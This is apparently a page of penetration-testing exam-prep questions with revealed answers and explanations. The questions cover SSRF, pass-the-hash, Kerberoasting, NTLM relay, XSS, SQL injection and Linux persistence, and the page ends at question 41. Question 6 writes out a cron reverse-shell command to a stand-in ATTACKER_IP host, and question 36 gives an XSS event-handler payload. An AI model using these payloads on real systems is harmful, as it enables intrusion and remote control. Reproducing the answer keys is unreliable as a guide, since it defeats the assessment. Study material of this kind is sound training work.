Courseiva

CCNA Attacks and Exploits Questions

75 of 146 questions · Page 1/2 · Attacks and Exploits · Answers revealed

1
MCQhard

During a web application test, a tester discovers an endpoint that fetches a URL from user input without validation. They attempt to access the AWS metadata endpoint. Which IP address is commonly used for the cloud metadata service?

A.169.254.169.254
B.10.0.0.1
C.127.0.0.1
D.192.168.1.1
AnswerA

169.254.169.254 is the link-local address used by AWS, Azure and GCP instance metadata services. Reaching it via an unvalidated URL-fetch parameter demonstrates server-side request forgery, letting the tester retrieve IAM credentials and instance configuration from the cloud metadata endpoint.

Why this answer

169.254.169.254 is the link-local IPv4 address used by AWS EC2 Instance Metadata Service (IMDS), and it is also used by Azure, GCP, and OpenStack for their metadata services. An SSRF vulnerability that can reach this address can retrieve IAM credentials from the instance role, making it a critical finding in cloud-hosted web app tests.

Exam trap

The trap is confusing the metadata IP with common private or loopback addresses — candidates who have not memorized 169.254.169.254 may pick 127.0.0.1 thinking 'local service,' but the metadata service is a distinct link-local endpoint.

How to eliminate wrong answers

Option B is wrong because 10.0.0.1 is a private RFC 1918 address commonly used as a VPC gateway or router, not the metadata service. Option C is wrong because 127.0.0.1 is the IPv4 loopback address — it refers to the local host, not the cloud metadata endpoint. Option D is wrong because 192.168.1.1 is a typical home/office router LAN address, unrelated to cloud metadata.

2
Multi-Selectmedium

A penetration tester is performing a web application assessment. Which of the following are common techniques to identify and exploit IDOR vulnerabilities? (Select TWO.)

Select 2 answers
A.Perform a man-in-the-middle attack
B.Enumerate sequential IDs in URLs
C.Intercept requests and modify parameter values
D.Use SQL injection to bypass authentication
E.Inject malicious scripts into input fields
AnswersB, C

Enumerating sequential IDs in URLs means iterating through predictable object identifiers, such as invoice numbers or user IDs, to see if the application grants unauthorized access to resources that belong to other users. This is a core IDOR testing technique because it directly targets the lack of proper authorization on direct object references. By successfully retrieving other users' records with only a changed integer, the tester proves the access-control flaw.

Why this answer

IDOR involves manipulating object references; enumeration of IDs and modifying parameter values are common techniques.

3
MCQeasy

A penetration tester wants to perform a pass-the-hash attack against a Windows system using a captured NTLM hash. Which tool can be used to authenticate and execute commands remotely?

A.evil-winrm
B.Responder
C.pth-winexe
D.Hashcat
AnswerC

pth-winexe is purpose-built for pass-the-hash: it takes an NTLM hash and uses it to authenticate over SMB via the MSRPC services interface, then creates a service to execute arbitrary commands. It modifies the SMB authentication flow to compute the NTLM response using the supplied hash directly, bypassing the need for a plaintext password. This makes it ideal for lateral movement, whereas the other tools either lack SMB-based hash authentication or serve a different phase of an attack.

Why this answer

pth-winexe allows pass-the-hash authentication to Windows systems.

4
MCQhard

During a web application test, a tester discovers that the application uses JWTs for session management. The tester captures a JWT and notices the 'alg' header is set to 'none'. Which attack is the tester likely to perform?

A.Weak secret brute-force
B.Kid injection
C.Algorithm confusion (alg:none)
D.Key confusion
AnswerC

Algorithm confusion (alg:none) is correct because it exploits a JWT library's failure to enforce that the algorithm specified in the token's header matches a secure, expected algorithm. By setting "alg" to "none", the attacker removes the signature entirely and submits a token with only the header and payload; vulnerable servers will trust the token as if it were signed. This attack is particularly successful when the server does not explicitly block the "none" algorithm or fails to validate the token's integrity when no signature is present.

Why this answer

If the server accepts 'none' algorithm, an attacker can forge arbitrary tokens by setting alg=none and removing the signature.

5
Multi-Selectmedium

A penetration tester has gained initial access to an internal Windows server and wants to escalate privileges to SYSTEM. The tester identified that the current user has the SeImpersonatePrivilege enabled. Which TWO of the following tools or techniques would be most appropriate to exploit this privilege for privilege escalation?

Select 2 answers
A.PrintSpoofer
B.Potato attacks (e.g., JuicyPotato)
C.PsExec
D.Pass-the-Hash
E.Kerberoasting
AnswersA, B

PrintSpoofer is a local privilege escalation tool that exploits SeImpersonatePrivilege by creating a malicious named pipe and tricking the Print Spooler service into connecting to it, forcing a SYSTEM token to be impersonated. Unlike JuicyPotato, it relies on the printer spooler rather than COM objects, and it works on modern Windows versions (Windows 10/Server 2016+) where older Potato variants are mitigated. This makes it a direct, reliable method to escalate from an impersonating service account to SYSTEM.

Why this answer

Option A, PrintSpoofer, is correct because it abuses the SeImpersonatePrivilege by coercing the Print Spooler service into authenticating to a controlled named pipe, then impersonating the resulting SYSTEM token to gain elevated privileges. Option B, Potato attacks such as JuicyPotato, is correct because these techniques also leverage SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) by tricking a privileged service into connecting to an attacker-controlled COM server or named pipe, allowing token impersonation to SYSTEM. Option C, PsExec, is not appropriate here because it is a remote execution/lateral movement tool that requires administrative credentials or SMB access, not a local SeImpersonatePrivilege escalation technique.

Option D, Pass-the-Hash, is incorrect because it uses captured NTLM hashes for authentication to other systems and does not exploit SeImpersonatePrivilege. Option E, Kerberoasting, is incorrect because it targets service accounts with SPNs to crack their passwords offline and is unrelated to token impersonation privilege escalation.

6
Multi-Selecthard

A penetration tester successfully compromises a web server and wants to establish persistence on the system. Which THREE of the following are effective persistence mechanisms on a Linux system?

Select 3 answers
A.Adding a registry Run key
B.Creating a cron job that executes a reverse shell
C.Adding an SSH authorized_key for remote access
D.Creating a scheduled task via schtasks
E.Installing a systemd service
AnswersB, C, E

Creating a cron job that executes a reverse shell is a valid Linux persistence technique. An attacker can add an entry such as `*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'` to the user's crontab or /etc/crontab, causing a reverse shell to be re-established every five minutes if it is killed. Using `@reboot` instead ensures the cron job runs once at system startup, providing persistence across reboots. This is a reliable, operational method that only requires write access to the appropriate crontab file.

Why this answer

Cron jobs, SSH authorized_keys, and systemd services are common persistence methods on Linux. Scheduled tasks and registry Run keys are Windows-specific.

7
MCQmedium

You are performing a penetration test and capture a Kerberos TGS ticket for a service account. What kind of attack can you perform offline to crack the service account password?

A.AS-REP roasting
B.LLMNR poisoning
C.Pass-the-Ticket
D.Kerberoasting
AnswerD

Kerberoasting is the correct technique because it targets service accounts by requesting TGS tickets for SPNs. The TGS ticket includes an encrypted segment that is encrypted with the service account's NTLM hash, allowing an attacker to extract these tickets and crack them offline using dictionary or brute-force attacks to recover the plaintext password. This directly aligns with the scenario of capturing a Kerberos ticket for offline cracking.

Why this answer

Kerberoasting involves requesting TGS tickets and cracking them offline to recover service account passwords.

8
MCQmedium

During a Windows privilege escalation attempt, a tester finds that the SeImpersonatePrivilege is enabled for the current user. Which tool can be used to escalate privileges to SYSTEM using this privilege?

A.Mimikatz
B.Windows-Exploit-Suggester
C.PrintSpoofer
D.PowerUp
AnswerC

PrintSpoofer is the correct choice because it directly abuses SeImpersonatePrivilege by creating a named pipe and then coercing a SYSTEM-level process, typically the print spooler, to connect to it. Once the connection occurs, the tool impersonates the SYSTEM token from the named pipe connection, allowing the attacker to spawn a new process as SYSTEM. This is a textbook token impersonation attack, not a kernel exploit, making it the precise tool for the described privilege escalation attempt.

Why this answer

PrintSpoofer is a tool that exploits SeImpersonatePrivilege to impersonate SYSTEM tokens.

9
MCQmedium

During a penetration test, a tester captures NTLM hashes by spoofing LLMNR responses on the internal network. Which tool is most commonly used for this purpose?

A.ntlmrelayx
B.Hashcat
C.Responder
D.Bettercap
AnswerC

Responder is a purpose-built tool for LLMNR, NBT-NS, and mDNS poisoning. It listens for broadcast name resolution requests and answers them, causing clients to send their NTLMv1/v2 authentication challenges to the attacker's machine. By doing so, it directly captures the NTLM hashes from the challenge-response handshake, making it the correct tool for this task.

Why this answer

Responder is the standard tool for LLMNR/NBT-NS/mDNS poisoning to capture NTLM hashes.

10
MCQhard

In a Windows domain, you have compromised a user account with SeImpersonatePrivilege enabled. Which tool or technique would best leverage this privilege to escalate to SYSTEM?

A.PrintSpoofer
B.AlwaysInstallElevated
C.Pass-the-Hash with pth-winexe
D.Kerberoasting
AnswerA

PrintSpoofer is a well-known privilege escalation tool on Windows that exploits the SeImpersonatePrivilege typically held by service accounts. It leverages the Print Spooler's named pipe to trick a high-privileged process (SYSTEM) into connecting to a malicious pipe server, allowing the attacker to impersonate the SYSTEM token. This technique directly abuses token impersonation, making it the correct answer for a compromised user account with such privileges.

Why this answer

SeImpersonatePrivilege allows token impersonation; PrintSpoofer exploits it to get SYSTEM.

11
Multi-Selecthard

You have compromised a low-privileged Windows user and want to move laterally to a domain controller. Which THREE techniques could be used for lateral movement if you have valid credentials? (Select THREE.)

Select 3 answers
A.WMIExec
B.Token impersonation with PrintSpoofer
C.Pass-the-Hash with CrackMapExec
D.AS-REP roasting
E.PsExec
AnswersA, C, E

WMIExec authenticates over DCOM/RPC using valid domain credentials, executing commands remotely via Win32_Process without needing SMB write access or a service install. Against a domain controller, this satisfies the stem's credential-based lateral movement constraint, since the compromised low-privileged user's valid credentials drive the remote execution.

Why this answer

WMIExec (A) is correct because it leverages valid credentials to execute commands remotely over DCOM/WMI (typically via TCP 135 and dynamic RPC ports), enabling lateral movement to a domain controller without needing an interactive logon. Pass-the-Hash with CrackMapExec (C) is correct because it uses captured NTLM hashes with valid credentials to authenticate via SMB (and other protocols), allowing remote command execution and lateral movement across the domain. PsExec (E) is correct because it authenticates with valid credentials over SMB, copies a service binary to ADMIN$, and creates a remote service to execute commands on the target domain controller.

Token impersonation with PrintSpoofer (B) is not a lateral movement technique with valid credentials; it is a local privilege escalation method that abuses the SeImpersonate privilege to gain SYSTEM on the already-compromised host. AS-REP roasting (D) is not lateral movement; it is a credential access technique that requests AS-REP messages for accounts without Kerberos pre-authentication to crack their passwords offline.

12
MCQmedium

During a penetration test, you capture NTLM hashes by poisoning LLMNR requests. Which tool would you use to exploit this and obtain the hashes?

A.Responder
B.CrackMapExec
C.ntlmrelayx
D.Metasploit
AnswerA

Responder is a dedicated network-based attack tool that spoofs name resolution by sending malicious responses to LLMNR, NBT-NS, and mDNS queries. When a host tries to resolve a non-existent name, Responder answers and forces the client to authenticate to it, capturing NTLMv1/v2 challenge-response hashes in the process. These hashes are then offline-crackable or can be forwarded to ntlmrelayx for relay attacks, making Responder the standard tool for this initial hash-capture poisoning phase.

Why this answer

Responder is the primary tool used for LLMNR/NBT-NS/mDNS poisoning to capture NTLM hashes from network authentication attempts.

13
MCQhard

During a penetration test, a tester gains initial access to a Linux server and wants to pivot to an internal network that is not directly accessible. Which of the following tools is specifically designed for creating SOCKS proxies for pivoting?

A.chisel
B.netcat
C.nmap
D.hydra
AnswerA

Chisel is a high-performance tunneling tool that creates encrypted channels over HTTP/HTTPS, allowing an attacker to pivot into internal networks. It supports both TCP port forwarding and SOCKS5 proxy mode, enabling dynamic routing of traffic from tools like Nmap or proxychains through the compromised host. Its design specifically addresses the need for stealthy and flexible post-exploitation access, making it the appropriate choice for establishing a proxy-based pivot.

Why this answer

Chisel is a tool that creates tunnels and SOCKS proxies over HTTP, ideal for pivoting through restrictive networks.

14
MCQmedium

A tester is exploiting a web application and identifies a parameter that reflects user input in the response without sanitization. The tester wants to steal session cookies from other users. Which type of cross-site scripting (XSS) attack should the tester use?

A.Stored XSS
B.Blind XSS
C.Reflected XSS
D.DOM-based XSS
AnswerC

Reflected XSS is correct because the injected script is included in a request (commonly a URL parameter) and the server immediately echoes it back in the response without proper sanitization, causing the browser to execute it. The attacker can craft a malicious link containing the payload and trick the victim into clicking it; when the victim's browser sends the request, the reflected payload executes in the victim's session. This matches the scenario where the tester exploits the web application and sees the payload reflected directly in the response, making a crafted link the natural delivery vector.

Why this answer

Reflected XSS occurs when input is immediately reflected in the response. Stored XSS persists on the server. DOM-based XSS occurs client-side.

For stealing cookies, reflected XSS can be crafted into a link sent to the victim.

15
MCQmedium

A penetration tester is conducting an internal network assessment and wants to capture NTLMv2 hashes from Windows hosts without sending any authentication traffic. Which tool and attack technique should the tester use?

A.Responder with LLMNR/NBT-NS/mDNS poisoning
B.Metasploit's hashdump module
C.Hashcat with a wordlist attack
D.Bettercap with ARP spoofing
AnswerA

Responder is the correct tool because it actively listens for LLMNR, NBT-NS, and mDNS name-resolution queries broadcast by Windows hosts when DNS lookups fail. By replying with a spoofed response that claims to be the requested host, Responder forces the victim to initiate an SMB authentication handshake to the attacker, sending an NTLMv2 hash in the process. This hash can then be cracked offline with hashcat or relayed with ntlmrelayx, and the attack works without any prior credentials or access to the target system.

Why this answer

Responder poisons LLMNR/NBT-NS/mDNS to trick hosts into sending NTLM hashes to the attacker, capturing them without the attacker needing to authenticate.

16
MCQmedium

A penetration tester needs to crack NTLM hashes obtained from a Windows domain. The hashes are in the format used by Windows. Which hashcat mode should the tester use?

A.-m 22000
B.-m 1000
C.-m 0
D.-m 13100
AnswerB

Mode 1000 is exactly the Hashcat identifier for NTLM hashes, the raw MD4 digest of a UTF-16LE encoded password. Because NTLM hashes are unsalted, cracking them with mode 1000 allows direct dictionary, rule-based, and brute-force attacks at very high speeds on GPUs. This mode correctly parses the 32-character hexadecimal NTLM hash and compares candidate passwords using the same MD4 algorithm that Windows uses internally.

Why this answer

Hashcat mode 1000 is for NTLM hashes.

17
MCQmedium

A penetration tester is performing a web application test and wants to exploit a SQL injection vulnerability to extract data from a database. The tester knows that the application returns results in the HTTP response. Which type of SQL injection is being used?

A.Blind boolean-based
B.Blind time-based
C.Out-of-band
D.UNION-based
AnswerD

UNION-based SQL injection directly concatenates the attacker's injected SELECT statement to the original query using the UNION operator, so the modified result set is rendered in the HTTP response. The tester determines the exact number of columns and then selects the wanted columns from arbitrary tables (e.g., usernames and passwords) which appear as rows in the page. Because the data is returned in-band, this is the fastest and simplest method, and it also aids in retrieving system metadata like the DBMS version for further attacks.

Why this answer

UNION-based SQL injection returns results directly in the application's output.

18
MCQhard

A tester is using Hashcat to crack NTLM hashes. They want to try all possible passwords consisting of exactly 8 lowercase letters. Which attack mode and mask should they use?

A.-a 6 -m 1000 ?l?l?l?l?l?l?l?l
B.-a 3 -m 0 ?l?l?l?l?l?l?l?l
C.-a 3 -m 1000 ?l?l?l?l?l?l?l?l
D.-a 0 -m 1000 dictionary.txt
AnswerC

The correct answer combines attack mode 3 with NTLM hash mode 1000. Hashcat's attack mode 3 is a pure brute-force or mask attack, and the mask ?l?l?l?l?l?l?l?l systematically generates every 8-character string consisting of lowercase letters a through z. Any NTLM hash whose password matches that pattern will be recovered because the entire keyspace of 26^8 is exhaustively searched.

Why this answer

Brute-force mode (-a 3) with mask ?l?l?l?l?l?l?l?l tries all 8-letter lowercase combinations.

19
MCQmedium

A penetration tester needs to crack a large number of NTLM hashes. They have a wordlist and want to apply common password mutations. Which hashcat option enables the use of a rule file to mutate words?

A.-r
B.-a 0
C.-a 6
D.-m 1000
AnswerA

-r specifies a rule file for rule-based attack, enabling mutation of dictionary words such as appending digits or substituting characters to efficiently crack many hashes. In hashcat, -r loads a file containing rule functions like l (lowercase), u (uppercase), $ (append), s (substitute), applied to each word from a wordlist, generating candidate passwords without storing them all. For a large NTLM hash set, rule-based attacks greatly expand coverage while keeping disk usage minimal, so -r is the correct flag.

Why this answer

Hashcat's -r option specifies a rule file that defines transformations (mutation) on dictionary words.

20
MCQmedium

During a penetration test, a tester captures NTLMv2 hashes using Responder. The tester then uses ntlmrelayx to relay the captured hashes to a target server. Which of the following best describes this attack technique?

A.Kerberoasting attack
B.NTLM relay attack
C.SMB relay attack
D.Pass-the-hash attack
AnswerB

In an NTLM relay attack, the tester uses tools like Impacket's ntlmrelayx to capture an NTLMv2 challenge/response and immediately forward it to a target service, making the remote server believe the authentication came from the legitimate user. The attacker never needs the password or to crack the hash; the relayed exchange is accepted as valid proof of identity, enabling unauthorized access to services like SMB, HTTP, or LDAP.

Why this answer

NTLM relay attacks forward captured authentication attempts to other servers, allowing the attacker to authenticate without cracking the hash. This is distinct from pass-the-hash, which requires a hash of the target account for local authentication.

21
MCQeasy

A penetration tester wants to perform a pass-the-hash attack on a Windows target. Which tools can be used for this purpose? (Choose the best answer.)

A.sqlmap
B.pth-winexe
C.John the Ripper
D.Hashcat
AnswerB

pth-winexe is part of the Samba suite and is a utility specifically designed to execute commands on a remote Windows system using an NTLM hash in place of a password. It embeds the hash into the authentication handshake (e.g., SMB/Netlogon remote procedure call) to authenticate without needing the plaintext password. This makes it a direct implementation of the Pass-the-Hash technique for interactive command execution.

Why this answer

pth-winexe is a common tool for pass-the-hash attacks on Windows.

22
MCQhard

After compromising a Linux host, you want to escalate privileges by exploiting a cron job that runs a script with root privileges. The script references an executable using a relative path. Which attack technique is most appropriate?

A.PATH manipulation
B.SUID binary exploitation
C.Kernel exploit
D.DLL hijacking
AnswerA

PATH manipulation is the correct privilege escalation vector in this scenario because cron jobs often run with a minimal PATH such as /usr/bin:/bin. If a scheduled task invokes a command without an absolute path (e.g., 'tar' instead of '/usr/bin/tar'), an attacker who can place a malicious executable named 'tar' in any directory that appears earlier in the resolved search order—for instance, a world-writable directory like /tmp—can hijack execution. The cron daemon then executes the attacker's binary with the target user's privileges, enabling arbitrary command execution and potential root compromise if the job runs as root.

Why this answer

PATH manipulation works by modifying the PATH environment variable so that when the script calls the executable (by name only, no full path), the attacker's malicious version runs with the privileges of the script.

23
MCQeasy

Which SQL injection technique involves injecting a query that causes a delay in response, allowing the attacker to infer information based on response time?

A.Error-based SQL injection
B.UNION-based SQL injection
C.Boolean-blind SQL injection
D.Blind time-based SQL injection
AnswerD

Blind time-based SQL injection infers information by injecting a query that forces the database to sleep for a set interval only when a certain condition is true, then measuring the response time. For example, in MySQL an attacker can append 'AND SLEEP(5)' to make the query pause 5 seconds if the condition holds, allowing them to extract data character by character. This technique directly matches the description of injecting a query that leverages a temporal delay to infer database contents, so it is the correct answer.

Why this answer

Blind time-based SQL injection uses delays (e.g., WAITFOR DELAY) to infer true/false conditions.

24
MCQhard

During a web application test, you find a feature that allows users to export data as PDF. The PDF generation uses user input without sanitization. You inject an XML external entity that reads /etc/passwd and the content appears in the PDF. Which vulnerability is present?

A.Server-Side Request Forgery (SSRF)
B.XML External Entity (XXE)
C.Command injection
D.Cross-Site Scripting (XSS)
AnswerB

XXE uses external entities to read files.

Why this answer

The vulnerability is XML External Entity (XXE) because the PDF generator parses user-supplied XML and resolves external entity references, allowing the attacker to read local files like /etc/passwd. The defining signature is the injection of a DOCTYPE declaration with an ENTITY that references a file:// or similar URI, and the content appearing in the output. This is the textbook XXE file-disclosure scenario.

Exam trap

The trap is that the payload travels through a PDF export feature, so candidates assume the bug is in the PDF library or is an SSRF — but the root cause is XML entity resolution, and the exam tests whether you recognize the DOCTYPE/ENTITY signature as XXE regardless of the output channel.

How to eliminate wrong answers

Option A is wrong because SSRF causes the server to make HTTP requests to internal or external resources — the attacker retrieves responses from other services, not local files via XML entity resolution. Option C is wrong because command injection executes OS commands through shell metacharacters in input; here the payload is an XML entity, not a shell command, and the output is file content, not command output. Option D is wrong because XSS executes JavaScript in a victim's browser; the payload here is server-side XML parsed by the PDF engine, and the impact is server-side file disclosure, not client-side script execution.

25
MCQeasy

A tester wants to enumerate SMB shares and execute commands remotely on a Windows target using captured credentials. Which tool is most appropriate?

A.Hashcat
B.Responder
C.CrackMapExec
D.Bettercap
AnswerC

CrackMapExec is a post-exploitation tool that natively supports SMB share enumeration and remote command execution. It authenticates over SMB and can list shares, access files, and run arbitrary commands via named pipes or WMI. This makes it the correct choice for a tester who needs to enumerate SMB shares and execute commands in an Active Directory environment.

Why this answer

CrackMapExec is a versatile tool for SMB enumeration, command execution, and lateral movement with credentials.

26
MCQhard

A penetration tester has gained access to a Linux server and wants to move laterally to a Windows server. The tester captured a hash of a domain user. Which tool can be used to authenticate to the Windows server using the hash?

A.evil-winrm
B.Ligolo-ng
C.SSH
D.Chisel
AnswerA

evil-winrm is the correct choice because it natively supports pass-the-hash authentication against the WinRM service. Using the --hash flag, an attacker can authenticate with an NTLM hash (LM:NT) directly, circumventing the need for a cleartext password. This tool also provides an interactive PowerShell shell, making it a standard lateral-movement utility for post-exploitation on Windows servers.

Why this answer

evil-winrm supports pass-the-hash authentication over WinRM, allowing lateral movement.

27
MCQmedium

A tester is targeting a web application that makes server-side requests to internal resources based on user input. The tester attempts to access the AWS metadata endpoint at http://169.254.169.254/latest/meta-data/. The request returns sensitive cloud credentials. Which vulnerability is being exploited?

A.IDOR
B.SSRF
C.XXE
D.CSRF
AnswerB

SSRF (Server-Side Request Forgery) occurs when a web application makes HTTP requests to a destination chosen by an attacker without properly validating the URL or host. The attacker can pivot the server into requesting internal-only endpoints, such as cloud instance metadata (e.g., http://169.254.169.254/latest/meta-data/) or internal admin panels. Because the request originates from the server itself, firewalls and network segmentation may be bypassed, making SSRF a direct and high-impact match for the scenario where the tester targets server-side request behavior.

Why this answer

SSRF (Server-Side Request Forgery) allows the attacker to make the server send requests to internal resources. The metadata endpoint is a classic SSRF target. XXE can also access files but typically via entity injection, not direct URL.

28
MCQhard

A penetration tester discovers a web application that fetches URLs from user input without proper validation. The tester targets the internal cloud metadata endpoint at 169.254.169.254 to retrieve instance credentials. Which type of attack is this?

A.CSRF
B.XXE
C.SSRF
D.IDOR
AnswerC

SSRF (Server-Side Request Forgery) occurs when an attacker controls the URL that the server fetches, enabling requests to internal IPs, localhost, or cloud metadata services. The described web application that fetches URLs is a textbook SSRF vector: it lets the server make arbitrary outbound HTTP requests, bypassing network perimeters. This can expose internal services, credentials, or sensitive data, making SSRF the correct classification.

Why this answer

SSRF (Server-Side Request Forgery) occurs when the server makes requests to internal resources based on user input, and the cloud metadata endpoint is a common target.

29
MCQeasy

During a penetration test, a tester runs the Responder tool on the internal network and captures an NTLMv2 hash. Which type of network attack is being performed?

A.ARP spoofing
B.Relay attack
C.LLMNR/NBT-NS poisoning
D.SSL stripping
AnswerC

Responder listens for Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) queries that fail to resolve via DNS. It responds with its own IP address, tricking clients into sending authentication challenges (NTLMv1/v2 hashes) to the attacker, which can then be cracked offline or used in further attacks. This is the specific name-resolution poisoning technique that the responder tool is designed for, making it the correct choice.

Why this answer

Responder poisons LLMNR, NBT-NS, and mDNS queries to capture NTLM hashes from systems trying to resolve names.

30
Multi-Selecthard

During a penetration test, the tester gains access to a domain-joined Windows machine and wants to perform Kerberoasting. Which THREE conditions are necessary for a successful Kerberoasting attack?

Select 3 answers
A.Local administrator privileges on the target
B.Ability to request TGS-REP tickets
C.Valid domain user credentials
D.Plaintext password of the service account
E.Service accounts with SPNs registered
AnswersB, C, E

This is the core action in Kerberoasting: the attacker must be able to send a TGS-REQ for a target SPN and receive the corresponding TGS-REP ticket. The returned service ticket is encrypted with a key derived from the service account's password hash, so possessing that ticket enables offline brute-force or dictionary attacks to recover the plaintext password.

Why this answer

The user must have domain credentials, there must be service accounts with SPNs, and the attacker must be able to request TGS tickets. Plaintext passwords are not required, and local admin is not needed.

31
MCQhard

During an internal penetration test, the tester wants to relay captured NTLM authentication to a server to gain access. Which tool from the Impacket suite is specifically designed for NTLM relay attacks?

A.CrackMapExec
B.ntlmrelayx
C.Metasploit
D.Responder
AnswerB

ntlmrelayx is the core Impacket tool built specifically for NTLM relay: it listens for SMB, HTTP, HTTPS, and other authentication attempts, then relays that challenge-response handshake to a chosen target such as SMB, LDAP, MSSQL, or other protocols. It can automatically perform SMB-signing and EPA checks, dump secrets, create users, or execute commands as the impersonated user, and it optionally integrates with Responder for coerced authentication. This is why it is the dedicated answer for relaying rather than just capturing.

Why this answer

ntlmrelayx is the Impacket tool for relaying NTLM authentication.

32
MCQeasy

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR responses. Which tool is most commonly used for this purpose?

A.Responder
B.John the Ripper
C.Bettercap
D.Hashcat
AnswerA

Responder is the correct tool because it actively listens for LLMNR, NBT-NS, and mDNS name-resolution requests on the network and replies with spoofed responses that redirect the victim to the attacker's machine. When the target attempts to authenticate (e.g., to a fake SMB share), their system sends an NTLMv2 challenge-response hash, which Responder captures for offline cracking or relay attacks.

Why this answer

Responder is the standard tool for LLMNR/NBT-NS/mDNS poisoning to capture NTLM hashes.

33
MCQmedium

A tester is performing a web application test and finds an endpoint that accepts XML input. The tester sends a payload that includes an external entity referencing a local file. Which vulnerability is being tested?

A.IDOR
B.SSRF
C.XXE
D.Command injection
AnswerC

XML External Entity (XXE) injection occurs when an XML parser processes external entities defined in a DTD (Document Type Definition), allowing attackers to read local files, perform internal port scans, or cause denial of service. The 'e' in the stem strongly suggests 'external entity,' and the classic symptom is sensitive data disclosure, such as /etc/passwd or configuration files. This vulnerability arises when developers leave DTD processing and external entity resolution enabled in XML libraries, making XXE the correct finding.

Why this answer

XXE (XML External Entity) injection allows reading local files or performing SSRF via XML parsers.

34
MCQmedium

A tester is performing a Kerberoasting attack. After requesting TGS tickets, which hashcat mode should be used to crack them?

A.-m 1000
B.-m 13100
C.-m 18200
D.-m 5500
AnswerB

Hashcat mode 13100 is specifically designed for Kerberos 5 TGS-REP hashes in $krb5tgs$ format, typically extracted from memory (e.g., Impacket, Rubeus) or saved as .kirbi and converted. This is the correct mode because Kerberoasting yields a service ticket whose encrypted portion is encrypted with RC4-HMAC (etype 23) using the service account's NT hash.

Why this answer

Kerberoast tickets are TGS-REP hashes, mode 13100.

35
Multi-Selectmedium

During a web application penetration test, a tester identifies a SQL injection vulnerability. Which TWO techniques could be used to extract data from the database? (Select TWO.)

Select 2 answers
A.Command injection
B.XXE injection
C.Blind time-based SQL injection
D.Reflected XSS
E.UNION-based SQL injection
AnswersC, E

Time-based blind injection embeds conditional delays, such as database sleep functions, into the query. The tester infers each bit of data from whether the response is delayed, extracting content even when no output or error is returned, satisfying the requirement despite absent in-band feedback.

Why this answer

Blind time-based SQL injection (C) is correct because when the application returns no visible query output or error messages, the tester can inject conditional statements (e.g., WAITFOR DELAY in MSSQL or SLEEP() in MySQL) and infer data by measuring response delays. UNION-based SQL injection (E) is correct because it appends a crafted UNION SELECT statement to the original query, allowing the attacker to retrieve data from other tables or columns directly in the application's response when the column count and data types match. Command injection (A) targets OS command execution, not SQL query manipulation, so it does not extract database data.

XXE injection (B) exploits XML external entity parsing to read files or perform SSRF, which is unrelated to SQL injection. Reflected XSS (D) is a client-side scripting attack that executes JavaScript in a victim's browser and cannot query a database.

Exam trap

The trap is that the question says 'SQL injection' but lists non-SQLi techniques (command injection, XXE, XSS) as distractors — candidates who do not carefully map each option to the SQLi family may select an unrelated vulnerability class.

36
MCQmedium

A tester is performing a web application test and discovers a parameter that seems to reflect input in the response. The tester attempts a reflected XSS payload but the application filters script tags. Which XSS variant should the tester try next?

A.Blind XSS
B.Reflected XSS with event handlers
C.DOM-based XSS
D.Stored XSS
AnswerB

The tester found that the application reflects the input back in the HTTP response but filters out script tags. By injecting an event handler such as onerror within an HTML tag (e.g., <img src=x onerror=alert(1)>), the payload executes without needing a script element, thus bypassing the filter. This is a classic reflected XSS vector because the malicious script is included in the request and immediately rendered in the response, relying on the victim's interaction with a crafted link.

Why this answer

If script tags are filtered, HTML event handlers like onerror can still execute JavaScript.

37
MCQhard

A penetration tester is attempting to exploit a server-side request forgery (SSRF) vulnerability in a cloud-hosted web application to access the cloud metadata service. Which IP address should the tester target?

A.192.168.1.1
B.169.254.169.254
C.127.0.0.1
D.10.0.0.1
AnswerB

169.254.169.254 is a link-local address within the 169.254.0.0/16 range, reserved by RFC 3927, and is the well-known metadata service endpoint used by major cloud providers (AWS, GCP, Azure). It is reachable only from inside the instance itself and does not require routing; an SSRF vulnerability can be leveraged to send authenticated requests to this IP to retrieve instance metadata such as IAM temporary credentials, user-data scripts, or security group configurations. This is why it is a prime target during penetration tests against web applications with server-side request forgery flaws.

Why this answer

The cloud metadata service for most cloud providers (AWS, GCP, Azure) is accessible via 169.254.169.254.

38
MCQeasy

In a web application test, you find a parameter that directly references internal object IDs (e.g., user_id=123) and changing the ID allows access to another user's data. This vulnerability is known as:

A.Insecure Direct Object Reference (IDOR)
B.Cross-site scripting (XSS)
C.SQL injection
D.Cross-site request forgery (CSRF)
AnswerA

IDOR occurs when an application exposes internal object identifiers and fails to verify that the requester is authorised for the referenced object. Changing user_id=123 to another value returns another user's data, confirming missing authorisation checks on direct object references.

Why this answer

IDOR (Insecure Direct Object Reference) occurs when an application exposes internal object references without proper access control checks.

39
MCQmedium

A penetration tester gains a low-privilege shell on a Linux server. The command 'sudo -l' reveals that the user can run /usr/bin/less as root without a password. Which tool would the tester likely use to escalate privileges?

A.Metasploit
B.Hashcat
C.Chisel
D.GTFOBins
AnswerD

GTFOBins is a curated database of Unix binaries that can be exploited to bypass local security restrictions, such as misconfigured sudo permissions, SUID bits, or Linux capabilities. When you have a low-privilege shell, you enumerate what commands you can run with sudo (via sudo -l) and then search GTFOBins for those binaries to find tested one-liners that spawn a root shell, read sensitive files, or perform other privileged actions. It is the authoritative reference for this scenario because it provides exact command sequences that leverage trusted system binaries.

Why this answer

GTFOBins documents that less can be used to escalate privileges via the ! command when run with sudo.

40
MCQhard

You are attacking a web application and notice that it makes requests to internal services. You attempt to access the cloud metadata endpoint at http://169.254.169.254/. Which vulnerability are you most likely exploiting?

A.SSRF (Server-Side Request Forgery)
B.XXE (XML External Entity)
C.Command injection
D.CSRF (Cross-Site Request Forgery)
AnswerA

SSRF is the correct answer because the web application is being manipulated into making server-side HTTP requests to a URL controlled by the attacker. In cloud environments, the metadata endpoint (e.g., http://169.254.169.254/latest/meta-data/) is reachable only from the host, so a successful SSRF lets the attacker read instance credentials or security tokens. This directly matches the scenario of the server fetching an internal resource, unlike the other options.

Why this answer

SSRF (Server-Side Request Forgery) allows an attacker to make requests from the server to internal resources, including cloud metadata endpoints.

41
MCQeasy

A tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should be used for NTLM hashes?

A.-m 1000
B.-m 13100
C.-m 0
D.-m 22000
AnswerA

